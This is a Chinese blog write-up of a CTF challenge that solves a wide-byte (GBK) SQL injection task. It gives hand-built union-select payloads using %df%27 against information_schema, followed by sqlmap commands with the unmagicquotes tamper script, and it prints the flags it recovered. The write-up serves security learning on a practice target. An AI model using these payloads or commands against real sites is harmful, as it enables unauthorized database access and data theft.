南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量1.6k 收藏 4
点赞数 2
分类专栏: # ——【 SQL Inject】 ★ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/88676863
版权

题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

进入题目后先简单尝试一下。

很明显的宽字节注入

宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码

关于宽字节注入漏洞具体说明度娘一搜就出来了,这里不再赘述。

手工注入

1、判断列数:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23

order by 3 时报错,说明只有两列。

2、各类信息:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23

sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

3、库名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23

sae-chinalover

4、表名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,group_concat(table_name) 
from information_schema.tables 
where table_schema=database()%23

ctf,ctf2,ctf3,ctf4,news

5、ctf4表的列名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,group_concat(column_name) 
from information_schema.columns 
where table_name=0x63746634%23

id,flag

这里注意:要将表名ctf4转为16进制

这里提供一个字符串转16进制的网站:

http://www.5ixuexiwang.com/str/hex.php

转了16进制之后记得在前面加上0x

6、flag列的数据:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,(select flag from ctf4)%23

flag{this_is_sqli_flag}

 关于flag的答案

这道题提交的答案各不相同。除了刚刚在ctf4中的flag,在ctf2中还有个nctf的flag。

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 
union select 1,group_concat(id,content) from ctf2%23

nctf{query_in_mysql}

还有一个答案是我在度娘搜到别人提交的,在ctf4,不过我在ctf4已经找不到这个答案了。

nctf{gbk_3sqli}

sqlmap跑法

1、查看有哪些库:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs

这个时侯就要用到一个脚本了:

脚本名:unmagicquotes.py

作用:宽字符绕过

2、表名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

3、列名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

4、flag列的数据:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

flag{this_is_sqli_flag} 

这就是本题宽字节注入的两种解法。

烟敛寒林o
关注
专栏目录
宽字节注入
weixin_45634365的博客
02-28 545
一、魔术引号 有攻击必有防御 魔术引号属于SQL注入的防御,是PHP的一种防御手段,使用反斜线将单引号、双引号以及反斜线本身进行转义 单引号和双引号内的一切都是字符串,如果我们输入的东西不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入 ' -> \' " -> \" \ -> \\ 魔术引号防护很常见,虽然魔术引号在PHP5.3.0后就被废除,5.4.0后就被移除,但是一般的CMS全部都有使用,有专门的魔术引号函数 魔术引号在低版本中默认开启,打开php.in
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 1076
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
SQL Injection(3)
csu_vc的博客
09-04 357
0x01在SQL Server中,openrowset命令可以实现对远程OLE DB数据源的一次性链接。DBA可以用它来检索远程数据库上的数据,以此作为永久连接两个数据库的一种手段, 在使用openrowset前首先要启用Ad Hoc Distributed Queries服务,因为这个服务不安全所以SqlServer默认是关闭的启用Ad Hoc Distributed Queries的方法SQL
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
最新发布
qq_56035503的博客
07-26 750
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
南邮 sql injection 4
weixin_30871293的博客
04-08 150
题目: 继续注入吧~题目地址 TIP:反斜杠可以用来转义 仔细查看相关函数的用法 打开后,ctrl+u得: <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_qu...
injectionIII
逆钟夕的忘忧阁
10-23 807
http://johnholdsworth.com/injection.html
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 9019
渗透测试-SQL注入之宽字节注入
nctf 2018 web复现-手工sql注入
weidaxueshen1的博客
11-28 330
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHEMA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名 http://ctfgame.acdxvfsvd.net:20001...
NCTF-Writeup
Yukikaze_cxy
05-30 1702
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
CTF-Web-SQL注入
beihai2013
01-26 3290
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
sql宽字节注入
2202_75317918的博客
12-17 1229
时,使用了addslashes()处理后的数据在数据库中将以'形式保存,没有上面说的有\的问题,addslashes()起到插入数据不出错的作用,如果此时直接输出的话,数据正常。时,使用了addslashes()处理后的数据在数据库中将以\'形式保存,如果此时直接输出的话,就会发现比自己期待的内容多了个\,因此stripslashes()出场了,它能把\去掉(区别于str_replace(”\”, “”,$Str))。1、单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)
Injection III 使用介绍
weixin_44836266的博客
01-08 2263
安装使用 这是一款开源工具,可直接在AppStore商店直接搜索下载安装 安装好之后,打开工具运行,会在桌面顶部状态栏,初始状态是蓝色,配置好之后是橘红色 配置步骤 1、点击顶部状态栏,出现以下界面,点击Open Project,会弹出选择文件界面,选择你想打开的项目,选择后,会保存在Open Recent里面,后面可以快捷选择 2、使用xcode打开一个项目,在AppDelete文件加入以下代码 #if DEBUG Bundle(path: "/Applications/Inject
宽字节SQL注入
一米八多的瑞兹的博客
02-25 167
宽字节SQL注入 1. 宽字节注入基础 最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81 GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F) 2. 宽字节注入代码分析 Sqli-Less32 代码分析 mysql_real_escape_string() 和 ad
sqlmapsqllibs_05-宽字节注入-32-37
Xor0ne
07-29 334
本篇文章中的一些过滤讲解大部分来自于我的另外一篇博客,如果不太清楚,可以移步: Sqllibs-less32-37-宽字节 32、Bypass addslashes() 可以知道在这里过滤了斜杠、单引号、双引号,即会在符号前加上斜杠进行过滤。而由下图可以知道闭合方式为单引号,因此我们需要对这个进行绕过。 在此我们利用在单引号前加上%df,而由于转义会在单引号前面加上一个单引号,在犹豫设置了gbk编码,因此%df与斜杠(%5c)会被当做一个中文字符,这样的话,就类似于斜杠被吃掉了。 手工注入语句如下所示:
SQL注入之宽字节注入演示(详细介绍宽字节)
Firebasky的博客
05-02 4936
宽字节介绍原理即绕过演示 自己对宽字节的认识和理解,如果有错误望指出,共同学习。 宽字节的介绍 GBK 是占两个字节(也就是名叫宽字节,只要字节大于1的都是) ASCII 占一个字节 PHP中编码为GBK ,函数执行添加的是ASCII编码,mysql默认字符集是GBK等宽字节字符集 为什么要介绍宽字节? 宽字节的出现个人感觉是因为SQL语句过滤了一些字符,比如 ’ 转义成 /’ 或者 ...
【软件安全】cwe-89 SQL Injection(三)
Li_Jiaqian的博客
07-13 1130
万能密码注入:     用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。 针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Select user_id,user_type,email From users Where user_id='用户名' And password='密码'】。     由于网站后台在进行数据库查询的时候没有对
mysql sql宽字节注入_sqli-宽字节注入
weixin_35330796的博客
01-18 136
0x0 背景当某字符的大小为一个字节时,称其字符为窄字节.当某字符的大小为两个字节时,称其字符为宽字节.所有英文默认占一个字节,汉字占两个字节常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等0x1 宽字节注入原理程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引号不再具有‘作用’,...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值